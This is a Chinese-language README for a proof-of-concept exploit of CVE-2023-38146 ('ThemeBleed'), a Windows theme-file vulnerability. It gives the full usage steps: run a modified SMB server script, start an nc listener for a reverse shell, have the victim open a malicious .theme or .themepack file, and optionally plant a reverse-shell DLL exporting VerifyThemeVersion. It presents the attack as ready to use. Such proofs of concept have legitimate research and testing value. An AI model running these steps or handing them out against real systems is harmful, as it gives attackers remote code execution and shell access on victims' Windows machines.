
强烈启发自 https://github.com/gabe-k/themebleed,但该工具仅适用于 Windows(这也是我决定编写此工具的原因)。
使用了来自 impacket smbserver.py 的修改代码 (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)
博客文章: https://jnns.de/posts/cve-2023-38146-poc/
安装依赖并运行应用程序:
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# 在另一个终端中启动 nc 监听器
rlwrap -cAr nc -lvnp 4711
在易受攻击的机器上使用 "evil_theme.theme" 或 "evil_theme.themepack"。
坐享其成!
将导出了 "VerifyThemeVersion" 函数的 DLL 放入 "./td/" 文件夹中,并命名为 "Aero.msstyles_vrf_evil.dll"。你可以通过谷歌搜索找到示例 DLL,或使用我的示例 https://github.com/Jnnshschl/ThemeBleedReverseShellDLL。
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# 在另一个终端中启动 nc 监听器
rlwrap -cAr nc -lvnp 4711